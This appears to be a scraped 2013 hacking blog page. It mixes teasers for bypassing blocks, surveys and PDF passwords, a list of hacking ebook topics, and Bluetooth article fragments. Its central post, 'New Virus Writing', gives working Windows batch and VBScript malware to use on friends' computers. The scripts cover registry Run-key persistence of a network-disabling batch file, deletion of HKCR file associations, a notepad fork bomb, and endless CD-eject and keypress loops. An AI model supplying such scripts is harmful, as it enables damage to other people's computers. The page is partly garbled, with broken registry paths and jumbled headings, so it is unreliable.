Download Microsoft office 2013 Now!
Microsoft has just released the free preview version of the all new Microsoft Office 2013. You can now download Microsoft Office 2013 immediately on your computer to try it.
How to Access Blocked Websites Without Proxy
Access your favorite blocked website and social networking sites at your or college or your workplace without proxy.Download exciting software to access blocked websites.
Make a Very Dangerous Virus with Notepad
Now make your own viruses in Notepad. Make fun with these in your friends computer.
How to remove PDF password
In some PDF files, Owner set the password to that file. It restrict the print, copy or edit the content of PDF file. In such situation PDF password remover application help you to remove password.
How to bypass Surveys on websites
Many websites makes survey to proceed the download or to visit the website. These surveys prove to b headache. To bypass these surveys, there are some tricks to follow.
Thursday, 18 July 2013
Monday, 8 April 2013
Best 5 Hacking Ebooks to Learn Ethical Hacking
Have a look at the Content of this ebook
2. Advanced Malware research
3. Windows Hacking
4. Password Hacking
5. Email Hacking
6. Web Application Hacking
7. Website Defacement Domain Hacking
8. Miscellaneous Hacking
9. Mobile Computer Forensic
10. VoIP Wireless Hacking
11. Vulnerability discovery Penetration testing
12. Advanced Hacking with Metasploit
13. Firewall, IDs Honey pot Hacking
14. Securing System Networks.
- Develop and launch exploits using BackTrack and Metasploit.
- Employ physical, social engineering, and insider attack techniques.
- Build Perl, Python, and Ruby scripts that initiate stack buffer overflows.
- Understand and prevent malicious content in Adobe, Office, and multimedia files.
- Detect and block client-side, Web server, VoIP, and SCADA attacks.
- Reverse engineer, fuzz, and decompile Windows and Linux software.
- Develop SQL injection, cross-site scripting, and forgery exploits.
- Trap malware and rootkits using honeypots and SandBoxed.
Tuesday, 26 March 2013
New Virus Writing
All Scripts Here Are To Be Copied In Note Pad
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
Code:-
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been craxhed. Have a nice day.
GOTO MESSAGE
3. Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
4. Popping CD Drives
*This will make the CD drives constantly pop out*
Code:-
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
*This constantly makes it so the enter button is being pressed continuesly*
Code:-
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
IP Spoofing [PDF Article]
Tuesday, 19 February 2013
Bluetooth
TABLE OF CONTENTS:
5. Latest Reseach, Facts and Problems in Bluetooth
· Bluetooth-enabled medical equipment is presently being manufactured to be deployed at hospitals.
<< 4. History of Bluetooth Go to Index
4. History of Bluetooth
3. How Bluetooth Technology Works
<< 2. Applications 4. History of Bluetooth >>
2. Bluetooth Applications
- Bluetooth’s biggest contribution is to provide a phone with a headset that works wirelessly. This is possible by providing the caller with an earpiece and a small microphone attached to the caller’s shirt. The mobile phone can be located in a bag or anywhere in the body. The caller can dial a number even without touching a button on the mobile phone. This technology has the advantage of eliminating the radiation hitting the cerebral region.
- PDA, PC or laptop which has enabled Bluetooth can communicate with each other and update with its latest information. This technology has helped in synchronizing the data easily.
- It is difficult to send emails while travelling in a flight. On landing of the flight, the Bluetooth enabled laptop can send the email only when it gets in touch with the user’s phone.
- Wireless mouse and keyboards are introduced.
- One will be alerted on his/her mobile phone when your laptop receives the mail.
- One will be alerted on his/her mobile phone when your laptop receives the mail.
Monday, 18 February 2013
1. Bluetooth Technology

The key features of Bluetooth technology:
- Less complication
- Less power consumption
- Available at cheaper rates
- Robustness